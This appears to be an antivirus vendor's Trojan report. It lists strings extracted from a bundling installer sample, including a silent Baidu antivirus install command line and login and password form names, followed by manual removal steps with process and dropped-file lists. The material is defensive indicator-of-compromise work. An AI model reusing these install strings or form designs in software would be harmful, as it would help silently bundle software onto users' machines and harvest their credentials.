    CreateDirectory: can't create "%s" (err=%d)
    CreateDirectory: "%s" (%d)
    SetFileAttributes: "%s":X
    Sleep(%d)
    detailprint: %s
    Call: %d
    Aborting: "%s"
    Jump: %d
    verifying installer: %d%%
    unpacking data: %d%%
    ... %d%%
    http://nsis.sf.net/NSIS_Error
    ~nsu.tmp
    install.log
    %u.%u%s%s
    Skipping section: "%s"
    Section: "%s"
    New install of "%s" to "%s"
    .DEFAULT\Control Panel\International
    Software\Microsoft\Windows\CurrentVersion
    *?|<>/":
    invalid registry key
    HKEY_DYN_DATA
    HKEY_CURRENT_CONFIG
    HKEY_PERFORMANCE_DATA
    HKEY_USERS
    HKEY_LOCAL_MACHINE
    HKEY_CURRENT_USER
    HKEY_CLASSES_ROOT
    x%c
    RMDir: RemoveDirectory failed("%s")
    RMDir: RemoveDirectory on Reboot("%s")
    RMDir: RemoveDirectory("%s")
    RMDir: RemoveDirectory invalid input("%s")
    Delete: DeleteFile failed("%s")
    Delete: DeleteFile on Reboot("%s")
    Delete: DeleteFile("%s")
    %s: failed opening file "%s"
    "%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSd.exe" -mod=BDCooly.dll -install
    80.CRT.manifest
    .manifest
    C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nspB6.tmp\KVInstallHelper.dll
    B42A-24B8D3514ABA}\iexplore\AllowedDomains\*
    C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nspB6.tmp
    5\BaiduSd.exe
    aiduSDDetectPlug.dll
    ystem v2.46.5-Unicode
    : "%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSd.exe" -mod=BDCooly.dll -install
    %Program Files%\
    %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDDownloader.exe
    BDDownloader.exe
    ig.xml
    BDDOWN~1.EXE
    Exec: success (""%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSd.exe" -mod=BDCooly.dll -install")
    Helper.dll"
    \1.8.0.1255\BaiduSd.exe ", icon: ,2, sw=1, hk=0
    rogram Files\Baidu\BaiduSd\1.8.0.1255\BaiduSd.exe" -mod=BDCooly.dll -install
    %Program Files%\Baidu\BaiduSd\install.log
    1.28 0110
    \LOCALS~1\Temp\nslB3.tmp\config.ini\..\F30241_s_0523.exe"
    11.28 0110
    "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nslB3.tmp\config.ini\..\F30241_s_0523.exe"
    %Program Files%\Baidu\BaiduSd\1.8.0.1255
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config
    .VC80.CRT
    C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nslB3.tmp
    F30241_s_0523.exe
    CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsfB4.tmp
    C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
    C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nslB3.tmp\F30241_s_0523.exe
    %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.CRT
    1963590663
    %Documents and Settings%\All Users\Desktop
    %Documents and Settings%\All Users\Start Menu\Programs
    %Program Files%\Baidu\BaiduSd
    %Documents and Settings%\All Users
    %Documents and Settings%\All Users\Application Data
    1.8.0.1255

    ionrkf_70688.exe_280:


    dudu_b_55045.exe_668:


    pczh_98_2.exe_3228:


    pczh_98_2.exe_3228_rwx_10004000_00001000:

    callback%d

    BaiduSd.exe_1268:


    Mnyig.exe_2024:

    PrintOptions.Margins.Bottom
    PrintOptions.HTMLHeader.Strings
    PrintOptions.Orientation
    " id="W5M0MpCehiHzreSzNTczkc9d"?>        
    %.fE 
    Constraints.MinHeight
    Constraints.MinWidth
    " id="W5M0MpCehiHzreSzNTczkc9d"?>        &V
    " id="W5M0MpCehiHzreSzNTczkc9d"?>        T
    " id="W5M0MpCehiHzreSzNTczkc9d"?>        
    TFormUserLogin
    FormUserLogin
    30]%S
    EÞ,
    Z.czN
    Ce%x'x
    .xCn>
    .cx!Y
    T.yj1
    xZ<.ad
    imgLoginBottom
    " id="W5M0MpCehiHzreSzNTczkc9d"?>        
    ?
    btnLogin
    " id="W5M0MpCehiHzreSzNTczkc9d"?>        
    btnLoginClick
    " id="W5M0MpCehiHzreSzNTczkc9d"?>        
    lblQQLogin
    lblQQLoginClick
    lblQQLoginMouseEnter
    lblQQLoginMouseLeave
    edtRePass
    edtPassKeyPress
    edtUserKeyPress
    edtPass
    FormWebShow
    DisableErrors.fpExceptions
    HTMLCode.Strings
    BtnImage.Data
    BgPic.Data
    " id="W5M0MpCehiHzreSzNTczkc9d"?>        
    FormWebShowOnly
    " id="W5M0MpCehiHzreSzNTczkc9d"?>        
    PicBtnLeft.Data
    PicBtnRight.Data
    TabPic.Data
    ScrollLeftPic.Data
    ScrollRightPic.Data
    CloseBtnPic.Data
    MenuBtnPic.Data
    NewBtnPic.Data
    Act_Login
    version="11.0.2902.10471"
    name="Microsoft.Windows.Common-Controls"
    version="6.0.0.0"
    publicKeyToken="6595b64144ccf1df"
    http://www.w3.org/2001/XMLSchema
    http://www.w3.org/2000/xmlns/
    http://www.w3.org/2001/XMLSchema-instance
    errorUrl
    {surl}
    KeyWork
    loginurl
    keyword
    {"key":"
    TFMWEB
    TFORMLOGINTIPS
    TFORMUSERLOGIN
    TFORMWEBSHOW
    TFORMWEBSHOWONLY
    AInternal error: Extension Instance does not match Extension Label,Unsupported Application Extension block size
    Unknown GIF block type'Object type not supported for operation
    Unsupported PixelFormat
    Invalid stream operation
    Invalid extension introducerúiled to allocate memory for GIF DIB
    File "%s" not found
    Object type not supported.
    Transparent proxy cannot bind. UDP Not supported by this proxy.$Buffer terminator must be specified.!Buffer start position is invalid.
    Reply Code is not valid: %s
    Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
    Command not supported.
    Address type not supported."%d: Circular links are not allowed
    Stack already created.1Only one TIdAntiFreeze can exist per application.&Cannot change IPVersion when connected$Can not bind in port range (%d - %d)
    Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.
    Invalid Port Range (%d - %d)
    %s is not a valid service.
    %s is not a valid IPv6 address:The requested IPVersion / Address family is not supported.
    Set Size Exceeded.)UDP is not support in this SOCKS version.
    Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
    Operation now in progress.
    Operation already in progress.
    Socket operation on non-socket.
    Protocol not supported.
    Socket type not supported."Operation not supported on socket.
    Protocol family not supported.0Address family not supported by protocol family.
    &Error on loading Winsock2 library (%s)
    Resolving hostname %s.
    Connecting to %s.
    Socket Error # %d
    Operation would block.
    Node "%s" not found
    IDOMNode required.Attributes are not supported on this node type
    Invalid node type Mismatched paramaters to RegisterChildNodes Element does not contain a single text node4DOM Implementation does not support IDOMParseOptions#ItemTag property is not initialized
    Node is readonlyCRefresh is only supported if the FileName or XML properties are set
    Line*Error on call Winsock2 library function %s1Invalid URL encoded character (%s) at position %d
    Failed to clear tab control Failed to delete tab at index %d"Failed to retrieve tab at index %d Failed to get object at index %d"Failed to set tab "%s" at index %d Failed to set object at index %d
    JPEG error #%d
    JPEG Image File)"%s" DOMImplementation already registered
    No matching DOM Vendor: "%s"
    UTF-7Ênnot remove shell notification iconÊnnot create shell notification icon"PageControl must first be assigned"%s requires Windows Vista or later
    OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
    OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s=Error decoding URL style (%%XX) encoded string at position %d
    Invalid clipboard format Clipboard does not support Icons
    Cannot open clipboard/Menu '%s' is already being used by another form
    - Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.
    Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'
    %s property out of range
    Scan line index out of range!Cannot change the size of an icon Invalid operation on TOleGraphic$Unknown picture file extension (.%s)
    Unsupported clipboard format
    Failed to set data for '%s'
    Resource %s not found
    %s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
    Property %s does not exist
    Thread creation error: %s
    Thread Error: %s (%d)*Windows socket error: %s (%d), on API '%s'"Unable to find a Table of Contents
    No help found for %s#No context-sensitive help installed
    Unable to write to %s
    Invalid stream format$''%s'' is not a valid component name
    Invalid data type for '%s' List capacity out of bounds (%d)
    List count out of bounds (%d)
    List index out of bounds (%d) Out of memory while expanding memory stream
    Error reading %s%s%s: %s
    Failed to create key %s
    Failed to get data for '%s'
    Ancestor for '%s' not found
    Cannot assign a %s to a %s
    Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
    Class %s not found
    A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
    Cannot create file "%s". %s
    Cannot open file "%s". %s
    Operation not supported
    External exception %x
    Interface not supported
    %s (%s, line %d)
    Abstract Error?Access violation at address %p in module '%s'. %s of address %p
    System Error. Code: %d.
    Application Error1Format '%s' invalid or incompatible with argument
    No argument for format '%s'"Variant method calls not supported
    Invalid variant operation
    Invalid NULL variant operation%Invalid variant operation (%s%.8x)
    %s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
    Integer overflow Invalid floating point operation
    Invalid pointer operation
    Invalid class typecast0Access violation at address %p. %s of address %p
    Privileged instruction(Exception %s in module %s at %p.
    !'%s' is not a valid integer value('%s' is not a valid floating point value
    '%s' is not a valid date
    '%s' is not a valid time!'%s' is not a valid date and time
    '%s' is not a valid GUID value
    I/O error %d
    1.0.1011.1935
    1.0.0.0


    Remove it with Ad-Aware

    1. Download and install Ad-Aware Free Antivirus.
    2. Update the definition files.
    3. Run a full scan of your computer.


    Manual removal*

    1. Terminate malicious process(es) (How to End a Process With the Task Manager):

      bddownloader.exe:3092
      shandian.exe:1480
      dudu_b_55045.exe:668
      BDDownloader.exe:3960
      BDDownloader.exe:3520
      regsvr32.exe:1936
      BDKVWsc.exe:2740
      RegSvr32.exe:468
      RegSvr32.exe:3168

    2. Delete the original Trojan file.
    3. Delete or disinfect the following files created/modified by the Trojan:

      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMEvents.dll (15 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVDeskBand64.dll (4992 bytes)
      %Documents and Settings%\%current user%\LOCAL SETTINGS (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDConfig.dll (19152 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMReport.dll (2105 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMSkin.dll (37368 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\KVTray_PluginConfig.xml (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\KVMainframePluginContainerConfig.xml (384 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\npBaiduSDDetectPlug.dll (3616 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\monitor_config.dat (559 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\900.dat (8 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BaiduSdTray.exe (46916 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\NetService.ini (615 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\app.ico (2105 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\iexplore.exe.xml (528 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\res\InstallWnd.zip (12536 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMMsg.dll (33 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMSkin.dll (8281 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\RtpContainerConfig.xml (818 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\repairplugins\baidusdRepair.dll (601 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\ToastImage.png (5 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVTips.rdb (2392 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\uninst.exe (28288 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDShellExt64.dll (2321 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDAVCScan.dll (4992 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\Cooly_PluginConfig.xml (720 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BaiduSd.exe (13368 bytes)
      %Documents and Settings%\All Users\Application Data\Baidu\baidusd\Config\809.dat (3 bytes)
      %Documents and Settings%\All Users\Application Data\Baidu\baidusd\Config\811.dat (8 bytes)
      %Documents and Settings%\All Users\Application Data\Baidu\baidusd\Config\901.dat (8 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\804.dat (3 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\DriverManager.dll (601 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVTrayTipsPlugin.dll (6584 bytes)
      %Documents and Settings%\All Users\Start Menu\Programs\百度杀毒\百度杀毒.lnk (971 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\KVMainframePluginContainerConfig.xml (384 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\KavUpdate.dll (9320 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMAVE.dll (673 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\tuopan.png (3 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\806.dat (3 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVDownloadProtect_x64.dll (673 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDShellExt64.dll (14184 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\tips.xml (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMDownload.dll (11344 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMNet.dll (5873 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\monitor_config.dat (559 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDUDiskGuard.dll (8560 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\directui license.txt (593 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKV.rdb (3312 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\dnw.xml (149 bytes)
      %WinDir%\Temp\Perflib_Perfdata_1e0.dat (4 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\KVRtp_PluginConfig.xml (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\PluginInstallHelper.dll (3616 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BaiduSdUpdate.exe (19152 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDUDiskGuard.dll (1281 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMDownload.dll (1425 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVDeskBand.dll (673 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDMPerfMon.dll (673 bytes)
      %WinDir%\Temp\Perflib_Perfdata_c3c.dat (100 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\UserDetectionPlugin.dll (5520 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\TrustAndIso.dll (1281 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMStringUtils.dll (49 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\TrayPluginContainerConfig.xml (945 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\RepairPluginContainerConfig.xml (228 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\uninst.exe (5873 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\KVRtp_PluginConfig.xml (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\History\History.IE5\index.dat (676 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\Cooly_PluginConfig.xml (720 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\DesktopToast.exe (601 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\ToastLogo.ico (12024 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\RtpContainerConfig.xml (818 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVConfig.rdb (4992 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMRepMgr.dll (10136 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BAV\BDAVCScan.dll (601 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMUpdate.dll (5520 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMEvents.dll (15 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDLogicUtils.dll (9320 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\wverify.dat (15019 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDKitUtils.dll (54 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\BDKVRmvDevPlugin.dll (1281 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMNet.dll (28288 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\TrayPlugin.rdb (20624 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdSvc.exe (2321 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\cache_config.dat (469 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\scan_mgr_config.dat (5 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDMAVCached.dll (1425 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\FileMon.dll (3361 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\BDMSREng.dll (1425 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\System.dll (784 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BAV\bdmp.dat (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMPatchAgent.dll (784 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMPatchAgent.dll (26 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMFrameWork.dll (1425 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\coolyplugins\CoolyContainerConfig.xml (329 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\HIPS.dll (7345 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\index.dat (2916 bytes)
      C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Perflib_Perfdata_d84.dat (100 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\NetService.ini (615 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\hips.xml (17 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\repairplugins\RepairPluginContainerConfig.xml (228 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BSRLib.dat (5064 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMAVE.dll (6584 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\KVMainframe_PluginConfig.xml (1 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\ToastLogo.ico (2105 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bd0001.dll (673 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BaiduSdUProxy64.exe (23936 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDDownLoadProtectPlugin.dll (12536 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\811.dat (8 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVVirusPlugins.dll (12024 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdUProxy64.exe (4545 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\PrivacyProtect.dll (673 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDMRepBase.dll (5873 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\BDKVVirusPlugins.dll (2105 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\tuopan.png (3 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMStringUtils.dll (1856 bytes)
      %Documents and Settings%\All Users\Application Data\Baidu\baidusd\Config\806.dat (3 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\809.dat (3 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMSDWrench.dll (601 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\iexplore.exe.xml (528 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\baidusdRepair.dll (4992 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVDeskBand64.dll (601 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\CoolyContainerConfig.xml (329 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\bdmp.dat (784 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\updlog.dll (15 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\HIPS.dll (30968 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDShellExt.dll (15168 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\BDMSRCore.dll (1425 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVTray\TrayPlugin.rdb (18424 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
      %Program Files%\Common Files\Baidu\BDDownload\106\bddownloader.exe (9605 bytes)
      %Program Files%\Common Files\Baidu\BDDownload\106\bdcomproxy.dll (601 bytes)
      %Program Files%\Common Files\Baidu\BDDownload\106\7z.dll (2105 bytes)
      %Program Files%\Common Files\Baidu\BDDownload\106\dl.dll (14988 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.106.1[2014-6-29-0-5-59]\bddownloader.exe (41699 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.106.1[2014-6-29-0-5-59]\bdcomproxy.dll (2392 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsdBB.tmp (90616 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\dl.dll (65930 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.106.1[2014-6-29-0-5-59]\dl.dll (65930 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.106.1[2014-6-29-0-5-59]\7z.dll (12536 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsoBC.tmp\System.dll (784 bytes)
      %Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca.bak (677 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\res\onlineWnd.zip (14184 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\hu.dll (3312 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\BDMReport.dll.bdl (29865 bytes)
      %Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca (24 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\BDMNet.dll.bdl (28289 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\System.dll (784 bytes)
      %Documents and Settings%\All Users\Application Data\Baidu\Desktop\Global.db (16 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\bdt\33f59beac1c942dd19f41a7fd30f3f9b.bdt (647 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\BDMSkin.dll (36698 bytes)
      %Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca.bak (16 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\bdt\68905108990c088c31aead3b6d1651be.bdt (519 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\dl.dll (65930 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\BDMNetGetInfo.dll (11344 bytes)
      %Documents and Settings%\All Users\Application Data\Baidu\Common\Global.db (100 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\BDMDownload.dll (5520 bytes)
